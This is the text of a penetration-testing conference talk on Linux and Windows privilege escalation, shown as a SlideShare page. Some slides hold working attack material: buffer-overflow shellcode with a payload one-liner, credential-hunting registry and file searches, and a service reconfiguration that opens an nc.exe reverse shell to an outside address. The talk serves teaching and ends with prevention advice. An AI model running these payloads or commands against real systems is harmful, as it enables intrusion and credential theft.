Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

of

How fun of privilege escalation  Red Pill2017 Slide 1 How fun of privilege escalation  Red Pill2017 Slide 2 How fun of privilege escalation  Red Pill2017 Slide 3 How fun of privilege escalation  Red Pill2017 Slide 4 How fun of privilege escalation  Red Pill2017 Slide 5 How fun of privilege escalation  Red Pill2017 Slide 6 How fun of privilege escalation  Red Pill2017 Slide 7 How fun of privilege escalation  Red Pill2017 Slide 8 How fun of privilege escalation  Red Pill2017 Slide 9 How fun of privilege escalation  Red Pill2017 Slide 10 How fun of privilege escalation  Red Pill2017 Slide 11 How fun of privilege escalation  Red Pill2017 Slide 12 How fun of privilege escalation  Red Pill2017 Slide 13 How fun of privilege escalation  Red Pill2017 Slide 14 How fun of privilege escalation  Red Pill2017 Slide 15 How fun of privilege escalation  Red Pill2017 Slide 16 How fun of privilege escalation  Red Pill2017 Slide 17 How fun of privilege escalation  Red Pill2017 Slide 18 How fun of privilege escalation  Red Pill2017 Slide 19 How fun of privilege escalation  Red Pill2017 Slide 20 How fun of privilege escalation  Red Pill2017 Slide 21 How fun of privilege escalation  Red Pill2017 Slide 22 How fun of privilege escalation  Red Pill2017 Slide 23 How fun of privilege escalation  Red Pill2017 Slide 24 How fun of privilege escalation  Red Pill2017 Slide 25 How fun of privilege escalation  Red Pill2017 Slide 26 How fun of privilege escalation  Red Pill2017 Slide 27 How fun of privilege escalation  Red Pill2017 Slide 28 How fun of privilege escalation  Red Pill2017 Slide 29 How fun of privilege escalation  Red Pill2017 Slide 30 How fun of privilege escalation  Red Pill2017 Slide 31 How fun of privilege escalation  Red Pill2017 Slide 32 How fun of privilege escalation  Red Pill2017 Slide 33 How fun of privilege escalation  Red Pill2017 Slide 34 How fun of privilege escalation  Red Pill2017 Slide 35 How fun of privilege escalation  Red Pill2017 Slide 36 How fun of privilege escalation  Red Pill2017 Slide 37 How fun of privilege escalation  Red Pill2017 Slide 38 How fun of privilege escalation  Red Pill2017 Slide 39 How fun of privilege escalation  Red Pill2017 Slide 40 How fun of privilege escalation  Red Pill2017 Slide 41 How fun of privilege escalation  Red Pill2017 Slide 42 How fun of privilege escalation  Red Pill2017 Slide 43 How fun of privilege escalation  Red Pill2017 Slide 44 How fun of privilege escalation  Red Pill2017 Slide 45 How fun of privilege escalation  Red Pill2017 Slide 46 How fun of privilege escalation  Red Pill2017 Slide 47 How fun of privilege escalation  Red Pill2017 Slide 48 How fun of privilege escalation  Red Pill2017 Slide 49 How fun of privilege escalation  Red Pill2017 Slide 50 How fun of privilege escalation  Red Pill2017 Slide 51 How fun of privilege escalation  Red Pill2017 Slide 52 How fun of privilege escalation  Red Pill2017 Slide 53 How fun of privilege escalation  Red Pill2017 Slide 54 How fun of privilege escalation  Red Pill2017 Slide 55 How fun of privilege escalation  Red Pill2017 Slide 56 How fun of privilege escalation  Red Pill2017 Slide 57 How fun of privilege escalation  Red Pill2017 Slide 58 How fun of privilege escalation  Red Pill2017 Slide 59 How fun of privilege escalation  Red Pill2017 Slide 60 How fun of privilege escalation  Red Pill2017 Slide 61 How fun of privilege escalation  Red Pill2017 Slide 62 How fun of privilege escalation  Red Pill2017 Slide 63 How fun of privilege escalation  Red Pill2017 Slide 64 How fun of privilege escalation  Red Pill2017 Slide 65 How fun of privilege escalation  Red Pill2017 Slide 66 How fun of privilege escalation  Red Pill2017 Slide 67 How fun of privilege escalation  Red Pill2017 Slide 68 How fun of privilege escalation  Red Pill2017 Slide 69 How fun of privilege escalation  Red Pill2017 Slide 70 How fun of privilege escalation  Red Pill2017 Slide 71 How fun of privilege escalation  Red Pill2017 Slide 72 How fun of privilege escalation  Red Pill2017 Slide 73 How fun of privilege escalation  Red Pill2017 Slide 74 How fun of privilege escalation  Red Pill2017 Slide 75 How fun of privilege escalation  Red Pill2017 Slide 76 How fun of privilege escalation  Red Pill2017 Slide 77 How fun of privilege escalation  Red Pill2017 Slide 78 How fun of privilege escalation  Red Pill2017 Slide 79 How fun of privilege escalation  Red Pill2017 Slide 80 How fun of privilege escalation  Red Pill2017 Slide 81 How fun of privilege escalation  Red Pill2017 Slide 82 How fun of privilege escalation  Red Pill2017 Slide 83 How fun of privilege escalation  Red Pill2017 Slide 84 How fun of privilege escalation  Red Pill2017 Slide 85 How fun of privilege escalation  Red Pill2017 Slide 86 How fun of privilege escalation  Red Pill2017 Slide 87 How fun of privilege escalation  Red Pill2017 Slide 88 How fun of privilege escalation  Red Pill2017 Slide 89 How fun of privilege escalation  Red Pill2017 Slide 90 How fun of privilege escalation  Red Pill2017 Slide 91 How fun of privilege escalation  Red Pill2017 Slide 92 How fun of privilege escalation  Red Pill2017 Slide 93 How fun of privilege escalation  Red Pill2017 Slide 94 How fun of privilege escalation  Red Pill2017 Slide 95 How fun of privilege escalation  Red Pill2017 Slide 96 How fun of privilege escalation  Red Pill2017 Slide 97 How fun of privilege escalation  Red Pill2017 Slide 98 How fun of privilege escalation  Red Pill2017 Slide 99 How fun of privilege escalation  Red Pill2017 Slide 100 How fun of privilege escalation  Red Pill2017 Slide 101 How fun of privilege escalation  Red Pill2017 Slide 102 How fun of privilege escalation  Red Pill2017 Slide 103 How fun of privilege escalation  Red Pill2017 Slide 104 How fun of privilege escalation  Red Pill2017 Slide 105 How fun of privilege escalation  Red Pill2017 Slide 106 How fun of privilege escalation  Red Pill2017 Slide 107 How fun of privilege escalation  Red Pill2017 Slide 108 How fun of privilege escalation  Red Pill2017 Slide 109 How fun of privilege escalation  Red Pill2017 Slide 110 How fun of privilege escalation  Red Pill2017 Slide 111 How fun of privilege escalation  Red Pill2017 Slide 112 How fun of privilege escalation  Red Pill2017 Slide 113 How fun of privilege escalation  Red Pill2017 Slide 114 How fun of privilege escalation  Red Pill2017 Slide 115 How fun of privilege escalation  Red Pill2017 Slide 116 How fun of privilege escalation  Red Pill2017 Slide 117 How fun of privilege escalation  Red Pill2017 Slide 118 How fun of privilege escalation  Red Pill2017 Slide 119 How fun of privilege escalation  Red Pill2017 Slide 120 How fun of privilege escalation  Red Pill2017 Slide 121 How fun of privilege escalation  Red Pill2017 Slide 122 How fun of privilege escalation  Red Pill2017 Slide 123
Upcoming SlideShare
What to Upload to SlideShare
Next
Download to read offline and view in fullscreen.

10 Likes

Share

Download to read offline

How fun of privilege escalation Red Pill2017

Download to read offline

How fun of privilege escalation Red Pill2017
Organized by 2600 Thailand

How fun of privilege escalation Red Pill2017

  1. 1. How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  2. 2. # whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  3. 3. Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
  4. 4. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
  5. 5. # “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
  6. 6. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
  7. 7. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  8. 8. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  9. 9. # Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
  10. 10. # Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
  11. 11. # Remote and Local Exploitation Root
  12. 12. # “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
  13. 13. # “Privilege Escalation”
  14. 14. # “Privilege Escalation”
  15. 15. # “Privilege Escalation”
  16. 16. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape(restrict shell ,chroot) • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • Sudoer • System Misconfiguration • Kernel Exploitation • Remote Exploitation by local host
  17. 17. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
  18. 18. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  19. 19. # “Privilege Escalation” Ways for Linux • Weak password of high privilege users Maybe use the password similar to username Maybe use weak password root Password P@ssw0rd ….
  20. 20. # “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH
  21. 21. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
  22. 22. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  23. 23. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID • Can perform Overflow • Use Static Libc. (Nice to have)
  24. 24. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done ls –R / | grep “wsr” | grep “root”
  25. 25. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  26. 26. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
  27. 27. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  28. 28. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  29. 29. #objdump –d vul_app | grep “jmp” | grep “esp” # ROPgadget --binary vul_app --only "jmp“ | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  30. 30. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode system(“/bin//sh”) Shellcode= “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80” jmp %esp 0x08049f0f esp
  31. 31. #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
  32. 32. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
  33. 33. # “Privilege Escalation” Ways for Linux #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app tmp • Vulnerable Applications / Programs / Services use high privilege users
  34. 34. # “Privilege Escalation” Ways for Linux
  35. 35. # “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
  36. 36. # “Privilege Escalation” Ways for Linux But It’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c- 82b1d063aa6b&v=&b=&from_search=1
  37. 37. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly # ls -Ral /etc/cron*
  38. 38. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
  39. 39. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  40. 40. # “Privilege Escalation” Ways for Linux
  41. 41. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  42. 42. # “Privilege Escalation” Ways for Linux • Sudoer (Compromised user we got maybe in the sudoer list)
  43. 43. # “Privilege Escalation” Ways for Linux • System Misconfiguration
  44. 44. # “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
  45. 45. # “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile exploit on the target system on target like environment • Metasploitable is good exploit compile environment
  46. 46. # “Privilege Escalation” Ways for Linux #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D • Remote Exploitation by local host 127.0.0.1
  47. 47. # “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref : https://netsec.ws/?p=309 LinEnum http://www.rebootuser.com/?p=1758 LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  48. 48. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  49. 49. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  50. 50. # “Privilege Escalation” Ways for Linux • Case Study :
  51. 51. # “Privilege Escalation” Ways for Linux • Case Study :
  52. 52. # “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
  53. 53. # “Privilege Escalation” Ways for Linux • Case Study :
  54. 54. # “Privilege Escalation” Ways for Linux • Case Study :
  55. 55. Low Priv Other Unix Servers Dirty Cow Default password Crack root pass root Bypass Restrict Shell CMC # “Privilege Escalation” Ways for Linux • Case Study :
  56. 56. # “Privilege Escalation” Ways for Windows • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file and Registry • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • System Misconfiguration • Kernel Exploitation • Pass-the-hash • DLL Injection • DLL Hijacking • Remote Exploitation by local host • Hotpotato • Many more…
  57. 57. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
  58. 58. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
  59. 59. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  60. 60. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  61. 61. # Remote Exploit to escalate privilege • Exploit to vulnerability of the service misconfigure running with high privilege users WebShell
  62. 62. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
  63. 63. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
  64. 64. • PS Migration # “Privilege Escalation” Ways for Windows
  65. 65. • PS Migration # “Privilege Escalation” Ways for Windows
  66. 66. • PS Migration # “Privilege Escalation” Ways for Windows
  67. 67. # Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Pass PASS PWD
  68. 68. c:sysprep.inf c:sysprepsysprep.xml c:unattend.xml %WINDIR%PantherUnattendUnattended.xml %WINDIR%PantherUnattended.xml dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c: /s /b | findstr /si *vnc.ini # Remote Exploit to escalate privilege • Credential store in files
  69. 69. # Remote Exploit to escalate privilege https://adsecurity.org/?p=2288 (<DOMAIN>SYSVOL<DOMAIN>Policies)• Credential store in DC Policy Script files
  70. 70. # Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCUSoftwareORLWinVNC3Password" # Windows autologin reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" # SNMP Paramters reg query "HKLMSYSTEMCurrentControlSetServicesSNMP" # Putty reg query "HKCUSoftwareSimonTathamPuTTYSessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
  71. 71. # Remote Exploit to escalate privilege • Credential store in registry
  72. 72. # Remote Exploit to escalate privilege
  73. 73. # Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/ dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
  74. 74. # Remote Exploit to escalate privilege
  75. 75. # Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  76. 76. • Insecure Services permission # “Privilege Escalation” Ways for Windows
  77. 77. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  78. 78. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  79. 79. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
  80. 80. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows sc config upnphost binpath= "C:Inetpubnc.exe -nv 10.11.0.110 5555 -e C:WINDOWSSystem32cmd.exe"
  81. 81. • Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
  82. 82. # “Privilege Escalation” Ways for Windows
  83. 83. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
  84. 84. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths
  85. 85. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  86. 86. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  87. 87. # “Privilege Escalation” Ways for Windows
  88. 88. # “Privilege Escalation” Ways for Windows
  89. 89. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  90. 90. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  91. 91. # “Privilege Escalation” Ways for Windows GGEZ • Unquote path + MS15-067
  92. 92. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://msitpros.com/?p=2012 The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:WindowsSystem32 – C:WindowsSystem – C:Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
  93. 93. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
  94. 94. # “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  95. 95. https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows
  96. 96. https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows • DLL Hijacking
  97. 97. # “Privilege Escalation” Ways for Windows • Driver Exploitation
  98. 98. https://www.exploit-db.com/exploits/42665/ Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation• Driver Exploitation Example : # “Privilege Escalation” Ways for Windows
  99. 99. • HOT Potato # “Privilege Escalation” Ways for Windows
  100. 100. • HOT Potato # “Privilege Escalation” Ways for Windows Manual add user Use Hot Potato technique
  101. 101. # “Privilege Escalation” Ways for Windows • Pass-th-Hash
  102. 102. • Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
  103. 103. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  104. 104. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  105. 105. • Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
  106. 106. # “Privilege Escalation” Ways for Windows
  107. 107. # “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
  108. 108. # “Privilege Escalation” Ways for Windows
  109. 109. dpkg --add-architecture i386 && apt-get update && apt-get install wine32 pip install pyinstaller # “Privilege Escalation” Ways for Windows
  110. 110. # “Privilege Escalation” Ways for Windows DEMO Noobx_shell
  111. 111. # “Privilege Escalation” Ways for Windows
  112. 112. # “Privilege Escalation” Ways for Windows
  113. 113. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  114. 114. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  115. 115. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  116. 116. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  117. 117. # “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password Crack of high privilege level account
  118. 118. # “Privilege Escalation” on other devices
  119. 119. # Prevention • Secure by design • System hardening • Disable unused service • Disable/remove unused programs , users or backup files • Installed endpoint security • Strong Access Control and Authentication • Least Privilege • Patch Management • Security Assessment • Vulnerability Assessment • Penetration Testing
  120. 120. Q & A
  121. 121. Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  122. 122. • http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post- Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection # References
  • PouyaAmiri1

    Jul. 17, 2019
  • AhmedFathi124

    Sep. 27, 2018
  • halfxhalfx

    Jul. 11, 2018
  • ytermsak

    Oct. 17, 2017
  • PratshayaYindi

    Oct. 16, 2017
  • cyawut

    Oct. 6, 2017
  • SonicnanSame

    Oct. 4, 2017
  • suwitcha1

    Oct. 1, 2017
  • JavaRmutt

    Oct. 1, 2017
  • pprathan

    Oct. 1, 2017

How fun of privilege escalation Red Pill2017 Organized by 2600 Thailand

Views

Total views

3,659

On Slideshare

0

From embeds

0

Number of embeds

41

Actions

Downloads

236

Shares

0

Comments

0

Likes

10

×